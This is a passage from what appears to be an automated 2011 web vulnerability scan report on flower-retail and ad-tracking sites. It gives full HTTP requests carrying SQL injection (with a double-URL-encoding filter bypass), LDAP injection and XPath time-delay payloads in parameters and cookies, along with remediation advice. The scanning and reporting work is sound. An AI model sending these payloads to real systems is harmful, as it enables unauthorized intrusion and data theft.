Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 540338930
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://xcdn.xgraph.net
Path:   /17572/ai/xg.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /17572%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html;charset=utf-8
Server: Apache-Coyote/1.1
Content-Length: 1538
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>java.lang.IllegalStateException
   org.apache.catalina.connector.ResponseFacade.sendRedirect(ResponseFacade.java:435)
   net.netedge.beacon.BeaconServer.deliverAudiencePlacementGif(BeaconServer.java:810)
   net.netedge.beaco
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.18 logs.</u>
...[SNIP]...

Request 2

GET /17572%2527%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 2

HTTP/1.1 302 Moved Temporarily
Location: http://ib.adnxs.com/seg?add=108023
Server: Apache-Coyote/1.1
Content-Length: 0
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Set-Cookie: _push4xgat=1304902866869; Domain=.xgraph.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _mpush=D82FE5FA7F5F8A72D371134E46D9833; Domain=.xgraph.net; Expires=Thu, 08-May-2014 01:01:06 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"


2. LDAP injection

There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://blooms.1800flowers.com/cm [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 14e1fc02a2bff0a1)(sn=* and 14e1fc02a2bff0a1)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=14e1fc02a2bff0a1)(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_login=1304902869001684455414e1fc02a2bff0a1)(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=14e1fc02a2bff0a1)!(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_login=1304902869001684455414e1fc02a2bff0a1)!(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.2. http://www.ftd.com/ [TLTSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /

Issue detail

The TLTSID cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:27 GMT
X-Varnish: 869413438 869395927
Age: 335
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript"> <!-- jQuery(document).ready( function(){ jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js"); jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js"); } ); //--> </script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)!(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:28 GMT
X-Varnish: 729971806 729949891
Age: 416
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134961


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript">
<!--
jQuery(document).ready(
function(){
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js");
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js");
}
);
//-->
</script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The NETID01 cookie appears to be vulnerable to XPath injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the NETID01 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2',0)waitfor%20delay'0%3a0%3a20'--; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7
uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_0s-X=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s48j="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM9IzlDOAYc1U1kNgyhQng1Be7z7sLKw1xd7M/G6n4G+PviQjXOwUXKLcB48iFx8crf5HGEfF0887Q+iy3epGgFRZvmgTn1Qcp+ICmLmBprGKXIekE7Jl4bGa9oQC5IaLHOyw/Br6Qj6IQuoNj5mfJvLHqNgmqX9PdDfXFrZEEA9wHOZJ0motkDFe/vAeaB5Xp/5EVLHgOk7O6boUcDvIMREIphiKzK1Chi6xHSKPQfHUA0w9NV/4Z6E9R/aSZzi+KuSrbSLVztAAxSiwXlvAQ65absewpdZoy+uIXZL0iV02cnknuLa9//+XnBHR0Gf6UCl6WonVLCctZrPSG7osK+6ibEZuxs1J5dOjkzv+lUChocqxKkS83YuK3zosM9HVRWCHO9ZTvAPBFuNGe2tkr1WkHLmhmgpoVMAM67ByzAUObHSWgMKEY5Sku1bUJzj1hRanuffQf640okMVZK9l8GX0X9lIk+lzCMzbcV0f92zKSQG3mEb7PrxNNEpGmsF2lk3+vEHFWQGR6wXjVVUjh2h2CyFg7zc0IbKw5AJ6SFaoAj3GsJkdKUg6jcwjxsFn10+PxBQ3eiHzmfZzg5wuWs0KzgnhRS0JVObI1U8uM4CvDyLdIPNRJZNTiaOElKtl/1hUqSmAG+vmw64AfdEHU9+3pcoVPrPRyKpRbNv/rPvs+fupyE6BxZpJRPvvcfwyDWGWB3bvNb3b1FHzh3JcOfVbJv84k6iSuL074poA9xrOIAe+nyjIMy1fqRo5xI8tq5NVTASv7fRGtdl681WgLTFW7zXyvocArwa2L0Wk38pQK38Sdh//PeH/nbICXmw2pRW36GSCcM5qoF1B0lkphF+UBgarQW3Vcl+i0jP/aa4q7QF5WScoYL7gcotuYpX4JI4uQ/Z+PFzM2jaN/mc1igfcIUNBvDj9ji1ZXfNRUtNZN9ggKYDKWcKI03XAeR2fOOyAIC5vFNjil49imrT9stNuCV9Y+kjENDfwsUD54quOzPiiUggHr/hIrULsX0lpf9f9j4/doOk0AdUME/uvUMx1QiGbMVQX3s9Jcq1Gsj/o7aJAfVA4qf/funtCsIYE6PIuKqE4XCJDVuHo5QSI97nWrx06n2wHknf0Qfbl+vvSv3mnv+t4JjaPb6e0QhUnPkUrg88uAXeNjfwGJWAP7ZQfUgB/WaDNDhyLWP/Yh3rCUCR8uHaCQI9sKWAVbPw6iO5kceIVQzUWPMVKTcRB5qOOGrh3S5d5Urf1tG13gpjjuJ3PUTSeA16Ot6LDFVi5mcIBL8J4aZnR3klIKAk6kSjHkyA9SaYV9G84MU6EkJCzKx8ihoJoi04bbStfFZ/yfYBAbahOI4r0ZmIncghLeaJISxxd4RdBaStFPe5yWkeMLSY5xmbMq/Bc1FtQn9uYzJCBg5XvCKLU5my9/plxSgMR4fiVWSX0IM7P/nfQsaJG6bZeBxB/bPB1a+MuzhK7j5W3SnHNaojJlAe5OtFr8pKFNrxmxL8VOF0PcdCWqH/IjrUOXMoeBySv2OxuNlxuo="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
